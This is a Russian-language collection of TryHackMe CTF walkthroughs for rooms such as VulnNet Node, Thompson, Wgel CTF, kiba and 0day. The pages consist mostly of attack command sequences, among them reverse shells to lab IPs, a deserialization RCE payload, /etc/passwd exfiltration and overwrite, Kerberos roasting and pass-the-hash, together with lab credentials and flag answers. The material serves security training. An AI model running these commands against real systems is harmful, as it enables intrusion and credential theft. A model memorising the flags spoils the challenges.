Ответьте на вопросы ниже 18 | Развернуто 19 | ```commandline 20 | Ответ не нужен 21 | ``` 22 | 23 | ## Задание 2 24 | Создано: dalemazza 25 | 26 | Благодарим P41ntP4rr0t за помощь в пути . 27 | 28 | ### Ответьте на вопросы ниже 29 | пользователь.txt 30 | ```commandline 31 | nmap -sC -sV -A 32 | curl -s http:///robots.txt 33 | gobuster dir -u http:// -x php,txt -w /usr/share/wordlists/dirb/common.txt 34 | gobuster dir -u http:///scripts/ -x php,txt -w /usr/share/wordlists/dirb/common.txt 35 | curl -s http:///scripts/script.txt 36 | curl -s http://>/scripts/script.old 37 | ftpuser:T3@m$h@r3 38 | ftp 39 | ls 40 | cd workshare 41 | ls 42 | get New_site.txt - 43 | 44 | ``` 45 | ```commandline 46 | THM{6Y0TXHz7c2d} 47 | ``` 48 | корень.txt 49 | ```commandline 50 | sudo -l 51 | cat admin_checks 52 | sudo -u gyles /home/gyles/admin_checks 53 | python3 -c "import pty;pty.spawn('/bin/bash')" 54 | cat /opt/admin_stuff/script.sh 55 | cat /usr/local/bin/main_backup.sh 56 | 57 | nc -nlvp 4444 58 | cat /root/root.txt 59 | ``` 60 | ```commandline 61 | THM{fhqbznavfonq} 62 | ``` 63 | 64 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Tech_Supp0rt 1.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Tech_Supp0rt: 1](https://tryhackme.com/r/room/techsupp0rt1) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Взломайте машину и исследуйте цель. 8 | 9 | Пожалуйста, подождите около 5 минут, пока компьютер полностью загрузится! 10 | 11 | Примечание : тема и предупреждения о безопасности, встречающиеся в этой комнате, являются частью испытания. 12 | 13 | ### Ответьте на вопросы ниже 14 | Что такое флаг root.txt? 15 | ```commandline 16 | nmap 17 | smbmap -H 18 | smbclient ///websvr 19 | ls 20 | cat enter.txt 21 | adminи:Scam2021 22 | searchsploit subrion 23 | searchsploit -m php/webapps/49876.py 24 | python3 49876.py -u http:///subrion/panel/ -l admin -p Scam2021 25 | ls -la /var/www/html/wordpress/ 26 | cat /var/www/html/wordpress/wp-config.php 27 | # ImAScammerLOL!123! 28 | ssh scamsite@ 29 | sudo -l 30 | sudo iconv -f 8859_1 -t 8859_1 /root/root.txt 31 | ``` 32 | 33 | ```commandline 34 | 851b8233a8c09400ec30651bd1529bf1ed02790b 35 | ``` 36 | 37 | 38 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Thompson.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Thompson](https://tryhackme.com/r/room/bsidesgtthompson) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | прочитать user.txt и root.txt 8 | 9 | ### Ответьте на вопросы ниже 10 | пользователь.txt 11 | ```commandline 12 | nmap -sC -sV -p- 13 | curl -i http://:8080/manager/html 14 | # tomcat:s3cret 15 | msfvenom -p java/jsp_shell_reverse_tcp lhost= lport=4444 -f war -o shell.war 16 | msfconole -q 17 | use multi/handler 18 | set lhost 19 | run -j 20 | sessions 21 | sessions -i 1 22 | id 23 | cat /home/jack/user.txt 24 | ``` 25 | ```commandline 26 | 39400c90bc683a41a8935e4719f181bf 27 | ``` 28 | корень.txt 29 | ```commandline 30 | cat /etc/crontab 31 | cat id.sh 32 | printf '#!/bin/bash\ncat /root/root.txt > test.txt' > id.sh 33 | cat test.txt 34 | ``` 35 | ```commandline 36 | d89d5391984c0450a95497153ae7ca3a 37 | ``` 38 | 39 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/TryHack3M Bricks Heist.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [TryHack3M: Bricks Heist](https://tryhackme.com/r/room/tryhack3mbricksheist) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | От трех миллионов кирпичей до трех миллионов транзакций! 8 | 9 | Brick Press Media Co. работала над созданием совершенно новой веб-темы, представляющей собой известную стену из трех миллионов байтовых кирпичей. Агент Мерфи идет с полосой неудач. И вот снова: сервер скомпрометирован, и они потеряли доступ. 10 | 11 | Можете ли вы взломать сервер и выяснить, что там произошло? 12 | 13 | Примечание: добавьте MACHINE_IP bricks.thm в файл /etc/hosts . 14 | ### Ответьте на вопросы ниже 15 | Каково содержимое скрытого .txt-файла в веб-папке? 16 | ```commandline 17 | THM{fl46_650c844110baced87e1606453b93f22a} 18 | ``` 19 | Как называется подозрительный процесс? 20 | ```commandline 21 | nm-inet-dialog 22 | ``` 23 | Каково название службы, связанной с подозрительным процессом? 24 | ```commandline 25 | ubuntu.service 26 | ``` 27 | Каково имя файла журнала экземпляра майнера? 28 | ```commandline 29 | inet.conf 30 | ``` 31 | Каков адрес кошелька экземпляра майнера? 32 | ```commandline 33 | bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa 34 | ``` 35 | Используемый адрес кошелька был задействован в транзакциях между кошельками, принадлежащими к какой группе угроз? 36 | ```commandline 37 | LockBit 38 | ``` 39 | 40 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Tutorial.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Tutorial](https://tryhackme.com/r/room/tutorial) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | На TryHackMe вы научитесь запускать и взламывать машины 8 | Давайте запустим ваш AttackBox — веб-машину, используемую для атаки на другие машины, которые вы запускаете для 9 | выполнения задач. 10 | 11 | 12 | Нажмите синюю кнопку в верхней части этой комнаты; AttackBox — это то, что вы будете использовать для доступа к 13 | целевым машинам, которые вы запускаете для таких задач, как эта. 14 | Запустите целевую машину, указанную в этой задаче, и подождите 1 минуту, пока она настроится. 15 | Скопируйте IP-адрес машины, которую вы только что запустили в этой задаче, затем на AttackBox (справа) откройте 16 | Firefox (на AttackBox) и вставьте IP-адрес в строку URL. 17 | Машины, которые вы запускаете в задачах (слева), являются «целевыми машинами» и к ним обращается AttackBox (справа). 18 | (Дополнительно) В качестве альтернативы вы можете получить доступ к машинам через OpenVPN. 19 | Закончив работу с машиной в любой комнате, обязательно остановите ее, нажав красную кнопку «Завершить». 20 | ### Ответьте на вопросы ниже 21 | Следуйте инструкциям в этой задаче. Какой текст флага отображается на веб-сайте машины, которую вы запустили в этой 22 | задаче? 23 | Флаг — это просто фрагмент текста, который используется для подтверждения того, что вы выполнили определенное 24 | действие. В испытаниях безопасности пользователям предлагается найти флаги, чтобы доказать, что они успешно взломали 25 | машину 26 | 27 | 28 | ```commandline 29 | flag{connection_verified} 30 | ``` 31 | 32 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Valley.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 4 | 5 | # Комната [Valley](https://tryhackme.com/r/room/valleype) 6 | 7 | Всего 1 заданиe: 8 | ## Задание 1 9 | Загрузите систему и найдите способ получить доступ вплоть до root! 10 | ### Ответьте на вопросы ниже 11 | Что такое флаг пользователя? 12 | ```commandline 13 | nmap -sC -sV -p- 14 | gobuster dir -u http:// -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 2>/dev/null 15 | # http:///dev1243224123123/ 16 | # http:///dev1243224123123/dev.js 17 | # siemDev: 18 | ftp -p 37370 19 | get siemHTTP2.pcapng - 20 | cat index.html 21 | # valleyDev: 22 | ssh valleyDev@ 23 | cat user.txt 24 | ``` 25 | ```commandline 26 | THM{k@l1_1n_th3_v@lley} 27 | ``` 28 | Что такое корневой флаг? 29 | ```commandline 30 | sudo -l 31 | cat /etc/crontab 32 | cat /photos/script/photosEncrypt.py 33 | ./valleyAuthenticator 34 | file valleyAuthenticator 35 | strings valleyAuthenticator 36 | nc -nvlp 1234 37 | root.txt 38 | ``` 39 | ```commandline 40 | THM{v@lley_0f_th3_sh@d0w_0f_pr1v3sc} 41 | ``` 42 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/VulnNet Node.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [VulnNet: Node](https://tryhackme.com/r/room/vulnnetnode) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | VulnNet Entertainment переместили свою инфраструктуру и теперь они уверены, что больше никаких нарушений не 8 | повторится. Вам поручено доказать обратное и проникнуть в их сеть. 9 | 10 | Уровень сложности: легкий 11 | Веб-язык: JavaScript 12 | Это снова попытка воссоздать более реалистичный сценарий, но с технологиями, упакованными в одну машину. Удачи! 13 | 14 | Значок создан Freepik с сайта www.flaticon.com 15 | 16 | ### Ответьте на вопросы ниже 17 | Что такое флаг пользователя? (user.txt) 18 | ```commandline 19 | nmap -sC -sV 20 | gobuster dir -u http://:8080/ -w /usr/share/wordlists/dirb/common.txt 21 | https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ 22 | python nodejsshell.py 4444 23 | echo -n '{"rce":"_$$ND_FUNC$$_function (){ eval(String.fromCharCode10,118,97,114,[REDACTED],84,41,59,10))}()"}' | base64 24 | nc -nvlp 4444 25 | sudo -l 26 | mkdir ~/tmp 27 | echo '{"scripts": {"preinstall": "/bin/sh"}}' > ~/tmp/package.json 28 | sudo -u serv-manage /usr/bin/npm -C ~/tmp/ --unsafe-perm i 29 | id 30 | python3 -c "import pty;pty.spawn('/bin/bash')" 31 | cd /home/serv-manage/ 32 | cat user.txt 33 | ``` 34 | ```commandline 35 | THM{064640a2f880ce9ed7a54886f1bde821} 36 | ``` 37 | 38 | Что такое корневой флаг? (root.txt) 39 | ```commandline 40 | find / -type f -name vulnnet-auto.timer -exec ls -l {} + 2>/dev/null 41 | sudo -l 42 | cd /etc/systemd/system 43 | cat vulnnet-auto.timer 44 | cat vulnnet-job.service 45 | sudo -u root /bin/systemctl stop vulnnet-auto.timer 46 | 47 | cat > /etc/systemd/system/vulnnet-auto.timer << EOF 48 | [Unit] 49 | Description=Run VulnNet utilities every 30 min 50 | 51 | [Timer] 52 | OnBootSec=0min 53 | OnCalendar=*:0/1 54 | Unit=vulnnet-job.service 55 | 56 | [Install] 57 | WantedBy=basic.target 58 | EOF 59 | 60 | 61 | cat > /etc/systemd/system/vulnnet-job.service << EOF 62 | [Unit] 63 | Description=Logs system statistics to the systemd journal 64 | Wants=vulnnet-auto.timer 65 | 66 | [Service] 67 | Type=forking 68 | ExecStart=/bin/sh -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.50.72 5555 >/tmp/f' 69 | 70 | [Install] 71 | WantedBy=multi-user.target 72 | EOF 73 | 74 | 75 | sudo -u root /bin/systemctl daemon-reload 76 | sudo -u root /bin/systemctl start vulnnet-auto.timer 77 | nc -nlvp 5555 78 | cat root.txt 79 | ``` 80 | ```commandline 81 | THM{abea728f211b105a608a720a37adabf9} 82 | ``` 83 | 84 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/VulnNet Roasted.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [VulnNet: Roasted](https://tryhackme.com/r/room/vulnnetroasted) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | VulnNet Entertainment только что развернули новый экземпляр в своей сети с недавно нанятыми системными 8 | администраторами. Будучи компанией, заботящейся о безопасности, они, как всегда, наняли вас для проведения теста на 9 | проникновение и проверки работы системных администраторов. 10 | 11 | Уровень сложности: легкий 12 | Операционная система: Windows 13 | Это гораздо более простая машина, не думайте слишком много. Вы можете сделать это, следуя общепринятым методикам. 14 | 15 | Примечание: Полная загрузка компьютера может занять до 6 минут. 16 | 17 | Значок создан DinosoftLabs с сайта www.flaticon.com 18 | 19 | ### Ответьте на вопросы ниже 20 | Что такое флаг пользователя? (Desktop\user.txt) 21 | ```commandline 22 | nmap -sC -sV -p- 23 | smbclient -L 24 | smbmap -u anonymous -H 25 | python3 /usr/share/doc/python3-impacket/examples/lookupsid.py anonymous@ | tee users.txt 26 | grep SidTypeUser users.txt | awk '{print $2}' | cut -d "\\" -f2 > users.txt 27 | cat users.txt 28 | 29 | python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py \ 30 | -dc-ip \ 31 | -usersfile users.txt \ 32 | -no-pass \ 33 | vulnnet-rst.local/ 34 | 35 | /data/src/john/run/john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 36 | # User: t-skid 37 | # Password: tj072889* 38 | 39 | smbclient -U vulnnet-rst.local/t-skid ///NETLOGON 40 | ls 41 | get ResetPassword.vbs - 42 | # User: a-whitehat 43 | # Password: bNdKVkjv3RR9ht 44 | 45 | evil-winrm -i -u a-whitehat -p "bNdKVkjv3RR9ht" 46 | cd enterprise-core-vn\Desktop 47 | cat user.txt 48 | ``` 49 | ```commandline 50 | THM{726b7c0baaac1455d05c827b5561f4ed} 51 | ``` 52 | Что такое системный флаг? (Desktop\system.txt) 53 | ```commandline 54 | python3 secretsdump.py vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@ 55 | evil-winrm -i -u administrator -H "c2597747aa5e43022a3a3049a3c3b09d" 56 | ``` 57 | ```commandline 58 | THM{16f45e3934293a57645f8d7bf71d8d4c} 59 | ``` 60 | 61 | 62 | 63 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/W1seGuy.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [W1seGuy](https://tryhackme.com/r/room/w1seguy) 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | Да, это снова я с очередным крипточелленджем! 8 | 9 | Прежде чем перейти к заданию 2, ознакомьтесь с исходным кодом. 10 | 11 | Вы можете просмотреть исходный код, нажав кнопку «Загрузить файлы задания» в верхней части этого задания, чтобы загрузить нужный файл. 12 | 13 | ### Ответьте на вопросы ниже 14 | Я скачал исходный код. 15 | ```commandline 16 | Ответ не нужен 17 | ``` 18 | 19 | ## Задание 2 20 | Твой друг сказал мне, что ты мудрый, но я им не верю. Можешь ли ты доказать мне обратное? 21 | 22 | Когда вы будете готовы, нажмите кнопку Start Machine , чтобы запустить виртуальную машину. Пожалуйста, подождите 3-5 минут, чтобы виртуальная машина полностью запустилась. 23 | 24 | Сервер прослушивает порт 1337 через TCP . Вы можете подключиться к нему с помощью Netcat или любого другого инструмента, который вам нравится. 25 | 26 | ### Ответьте на вопросы ниже 27 | Какой первый флаг? 28 | ```commandline 29 | THM{p1alntExtAtt4ckcAnr3alLyhUrty0urxOr} 30 | ``` 31 | 32 | Какой второй и последний флаг? 33 | 34 | ```commandline 35 | THM{BrUt3_ForC1nG_XOR_cAn_B3_FuN_nO?} 36 | ``` 37 | 38 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Welcome.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Welcome](https://tryhackme.com/r/room/hello) 4 | 5 | Всего 3 задания: 6 | ## Задание 1 7 | Представьте себе комнату как виртуальный класс, в котором изучают тему безопасности. 8 | 9 | Вы будете использовать комплекс руководств и заданий для повышения квалификации в различных областях кибербезопасности. 10 | ### Ответьте на вопросы ниже 11 | В комнатах есть вопросы, за которые вы получаете баллы. Используйте таблицы лидеров, чтобы узнать свое место среди 12 | других хакеров. 13 | ```commandline 14 | Ответ не нужен 15 | ``` 16 | 17 | ## Задание 2 18 | Некоторые задачи потребуют от вас обучения на практике, часто посредством взлома виртуальной машины. 19 | 20 | Доступ к машинам через браузер 21 | Управляйте свободной машиной в своем браузере, чтобы получить доступ к другим используемым вами машинам и быстрее выполнять взлом. 22 | 23 | Разверните машину, указанную в этой задаче, и подождите 1 минуту , пока она настроится. 24 | 25 | Скопируйте IP-адрес машины, которую вы развернули для этой задачи. 26 | 27 | 28 | Запустите AttackBox, нажав кнопку Start AttackBox. Как бесплатный пользователь, вы можете развернуть бесплатный 29 | AttackBox только один раз в день на 1 час — оформите подписку, чтобы снять это ограничение. 30 | 31 | Вставьте скопированный ранее IP-адрес в браузер Firefox на компьютере. 32 | 33 | 34 | Доступ к машине через OpenVPN 35 | ### Ответьте на вопросы ниже 36 | + 15 37 | Какой текст флага отображается на веб-сайте машины, которую вы задействовали для выполнения этой задачи? 38 | ```commandline 39 | flag{connection_verified} 40 | ``` 41 | 42 | ## Задание 3 43 | Теперь, когда вам удалось развернуть машину TryHackMe и получить к ней доступ, найдите тему по безопасности для 44 | изучения на странице Hacktivities. 45 | 46 | Не забудьте ознакомиться с нашими программами обучения для более организованного обучения. 47 | 48 | Другие интересные предложения: 49 | - Мы выпускаем еженедельные задания и пошаговые инструкции по безопасности 50 | - Вы можете загружать собственные виртуальные машины и создавать собственные комнаты. 51 | - Присоединяйтесь к нашему сообществу Discord и поздоровайтесь! 52 | ### Ответьте на вопросы ниже 53 | Прочитайте вышеизложенное и изучите TryHackMe! 54 | ```commandline 55 | Ответ не нужен 56 | ``` 57 | 58 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Wgel CTF.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 4 | 5 | # Комната [Wgel CTF](https://tryhackme.com/r/room/wgelctf) 6 | 7 | Всего 1 заданиe: 8 | ## Задание 1 9 | Получайте удовольствие от этой простой коробки. 10 | 11 | ### Ответьте на вопросы ниже 12 | ```commandline 13 | sudo nmap -sV -sS -A 14 | gobuster dir -u http:/// -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 20 15 | gobuster dir -u http:///sitemap/ -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 20 16 | ssh -i id_rsa jessie@ 17 | cat user_flag.txt 18 | ``` 19 | Пользовательский флаг 20 | ```commandline 21 | 057c67131c3d5e42dd5cd3075b198ff6 22 | ``` 23 | 24 | ```commandline 25 | sudo -l 26 | nc -lvnp 5555K 27 | sudo /usr/bin/wget --post-file=/etc/passwd http://:5555 28 | echo "toor:`openssl passwd toor`:0:0:root:/root:/bin/bash" >> passwd 29 | python3 -m http.server 30 | sudo /usr/bin/wget http://:8000/passwd -O /etc/passwd 31 | su toor 32 | ``` 33 | Корневой флаг 34 | ```commandline 35 | b1b968b37519ad1daa6408188649263d 36 | ``` 37 | 38 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Year of the Rabbit.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Year of the Rabbit](https://tryhackme.com/r/room/yearoftherabbit) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Давайте приятно и спокойно начнем Новый год! 8 | Сможете ли вы взломать коробку Года Кролика, не провалившись в яму? 9 | 10 | (Пожалуйста, убедитесь, что громкость включена!) 11 | 12 | ### Ответьте на вопросы ниже 13 | Что такое флаг пользователя? 14 | ```commandline 15 | nmap -sC -sV 10.10.156.211 16 | gobuster dir -u http://10.10.156.211 -w /usr/share/wordlists/dirb/common.txt 17 | # /assets 18 | # style.css 19 | # /sup3r_s3cr3t_fl4g.php 20 | # /WExYY2Cv-qU 21 | strings Hot_Babe.png > pass.txt 22 | hydra -l ftpuser -P pass.txt ftp://10.10.156.211 23 | 24 | ftp 10.10.156.211 25 | # password : 5iez1wGXKfPKQ 26 | ls 27 | get Eli’s_Creds.txt 28 | cat Eli\’s_Creds.txt 29 | 30 | # https://www.dcode.fr/brainfuck-language 31 | 32 | ssh eli@10.10.156.211 33 | DSpDiMlwAEwid 34 | locate s3cr3t 35 | cat /usr/games/s3cr3t/.th1s_m3ss4g3_15_f0r_gw3nd0l1n3_0nly! 36 | gwendoline:MniVCQVhQHUNI 37 | su gwendoline 38 | cat user.txt 39 | ``` 40 | ```commandline 41 | THM{1107174691af9ff3681d2b5bdb5740b1589bae53} 42 | ``` 43 | 44 | Что такое корневой флаг? 45 | ```commandline 46 | sudo -l 47 | sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt 48 | # !/bin/sh 49 | cd /root 50 | ls 51 | cat root.txt 52 | ``` 53 | ```commandline 54 | THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161} 55 | ``` 56 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/b3dr0ck.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [b3dr0ck](https://tryhackme.com/r/room/b3dr0ck) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Фред Флинтстоун и Барни Раббл! 8 | 9 | Барни настраивает веб-сервер ABC и пытается использовать сертификаты TLS для защиты соединений, но у него возникли 10 | проблемы. Вот что мы знаем... 11 | 12 | - Ему удалось установить nginxпорт 80, перенаправив его на пользовательский веб-сервер TLS на порт4040 13 | - Имеется прослушивающий TCP- сокет с простым сервисом, помогающим извлекать файлы учетных данных TLS (ключ клиента и 14 | сертификат) 15 | - Существует еще одна вспомогательная служба TCP (TLS), прослушивающая авторизованные соединения с использованием 16 | файлов, полученных от указанной выше службы. 17 | - Сможете ли вы найти все пасхальные яйца? 18 | 19 | Пожалуйста, подождите еще несколько минут, пока виртуальная машина полностью запустится. 20 | 21 | ### Ответьте на вопросы ниже 22 | Что такое флаг barney.txt? 23 | ```commandline 24 | THM{f05780f08f0eb1de65023069d0e4c90c} 25 | ``` 26 | Какой пароль у Фреда? 27 | ```commandline 28 | YabbaDabbaD0000! 29 | ``` 30 | Что такое флаг fred.txt? 31 | ```commandline 32 | THM{08da34e619da839b154521da7323559d} 33 | ``` 34 | Что такое флаг root.txt? 35 | ```commandline 36 | THM{de4043c009214b56279982bf10a661b7} 37 | ``` 38 | 39 | 40 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/kiba.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [kiba](https://tryhackme.com/r/room/kiba) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Сможете ли вы выполнить задание? 8 | Загрузка и настройка машины может занять до 7 минут. 9 | ### Ответьте на вопросы ниже 10 | Какая уязвимость свойственна языкам программирования с наследованием на основе прототипов? 11 | ```commandline 12 | nmap -sC -sV -p- 13 | ``` 14 | ```commandline 15 | Prototype pollution 16 | ``` 17 | Какая версия панели визуализации установлена на сервере? 18 | ```commandline 19 | 6.5.4 20 | ``` 21 | Какой номер CVE для этой уязвимости? Он будет в формате: CVE-0000-0000 22 | ```commandline 23 | CVE-2019-7609 24 | ``` 25 | Взломайте машину и найдите user.txt 26 | ```commandline 27 | nc -nlvp 4444 28 | git clone https://github.com/LandGrey/CVE-2019-7609.git 29 | cd CVE-2019-7609 30 | python CVE-2019-7609-kibana-rce.py -u http://:5601 -host -port 4444 --shell 31 | cat /home/kiba/user.txt 32 | ``` 33 | ```commandline 34 | THM{1s_easy_pwn3d_k1bana_w1th_rce} 35 | ``` 36 | Возможности — это концепция, которая обеспечивает систему безопасности, позволяющую «разделить» привилегии root на 37 | различные значения. 38 | ```commandline 39 | Ответ не нужен 40 | ``` 41 | Как бы вы рекурсивно перечислили все эти возможности? 42 | ```commandline 43 | getcap -r / 44 | ``` 45 | Повысить привилегии и получить root.txt 46 | ```commandline 47 | getcap -r / 2>/dev/null 48 | python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' 49 | cat /root/root.txt 50 | ``` 51 | ```commandline 52 | THM{pr1v1lege_escalat1on_us1ng_capab1l1t1es} 53 | ``` 54 | 55 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/magician.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [magician](https://tryhackme.com/r/room/magician) 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | Примечание: для запуска этой машины требуется около 7 минут, пожалуйста, наберитесь терпения :) 8 | 9 | Пожалуйста, добавьте IP-адрес этой машины с именем хоста "magician" в файл /etc/hosts на Linux перед началом. 10 | В Windows файл hosts должен находиться по адресу C:\Windows\System32\drivers\etc\hosts. 11 | 12 | Используйте имя хоста вместо IP-адреса, если вы хотите загрузить файл. Это необходимо для корректной работы комнаты ;) 13 | 14 | Получайте удовольствие и используйте свои магические навыки! 15 | 16 | ### Ответьте на вопросы ниже 17 | пользователь.txt 18 | ```commandline 19 | THM{simsalabim_hex_hex} 20 | ``` 21 | корень.txt 22 | ```commandline 23 | THM{magic_may_make_many_men_mad} 24 | ``` 25 | 26 | ## Задание 2 27 | Это комната от ripcurlz и ms.geeky. Надеемся, вам понравилось :) 28 | 29 | Вы можете отправить любой отзыв по адресу: broker.thm@protonmail.com 30 | 31 | ### Ответьте на вопросы ниже 32 | ```commandline 33 | Ответ не нужен 34 | ``` 35 | 36 | 37 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/tomghost.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [tomghost](https://tryhackme.com/r/room/tomghost) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Сможете ли вы выполнить задание? 8 | Загрузка и настройка машины может занять до 5 минут. 9 | 10 | Примечание администратора: эта комната содержит неприемлемый контент в виде имени пользователя, содержащего 11 | нецензурное слово, и должна быть отмечена как образовательная. - Темный 12 | 13 | ### Ответить на вопросы ниже 14 | 15 | Скомпрометируйте эту машину и получите user.txt 16 | ```commandline 17 | THM{GhostCat_1s_so_cr4sy} 18 | ``` 19 | Повысить привилегии и получить root.txt 20 | ```commandline 21 | THM{Z1P_1S_FAKE} 22 | ``` 23 | 24 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/0day.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [0day](https://tryhackme.com/r/room/0day) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Получите root-доступ к моему защищенному веб-сайту, сделайте шаг в историю взлома. 8 | 9 | ### Ответьте на вопросы ниже 10 | пользователь.txt 11 | ```commandline 12 | nmap -sSVC 13 | gobuster dir -u http:// -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 14 | nikto -h http:// 15 | searchsploit shellshock 16 | searchsploit -m linux/remote/34900.py 17 | python2.7 34900.py payload=reverse rhost= lhost= lport=4444 18 | nc -lvnp 4445 19 | bash -i >& /dev/tcp/10.2.81.7/4445 0>&1 20 | ls -la 21 | whoami 22 | cat /etc/passwd 23 | cd /home/ryan 24 | ls -la 25 | cat user.txt 26 | ``` 27 | ```commandline 28 | THM{Sh3llSh0ck_r0ckz} 29 | ``` 30 | корень.txt 31 | ```commandline 32 | uname -a 33 | https://www.exploit-db.com/exploits/37292 34 | vim 37292.c 35 | wget http:///37292.c 36 | export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin 37 | gcc 37292.c -o ofs 38 | ./ofs 39 | whoami 40 | cat /root/root.txt 41 | ``` 42 | ```commandline 43 | THM{g00d_j0b_0day_is_Pleased} 44 | ``` 45 | 46 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Anonymous.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Anonymous](https://tryhackme.com/r/room/anonymous) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Попробуйте получить оба флага! Получите права root на машину и докажите, что вы понимаете основы! Это виртуальная 8 | машина, предназначенная для новичков. Получение обоих флагов потребует некоторых базовых знаний Linux и методов 9 | повышения привилегий. 10 | -------------------------------------------------- ------------------ 11 | Для получения дополнительной информации о Linux посетите страницу Learn Linux. 12 | 13 | ### Ответьте на вопросы ниже 14 | Перечислите машины. Сколько портов открыто? 15 | ```commandline 16 | nmap -sC -sV -p- 17 | ``` 18 | ```commandline 19 | 4 20 | ``` 21 | Какая служба работает на порту 21? 22 | ```commandline 23 | ftp 24 | 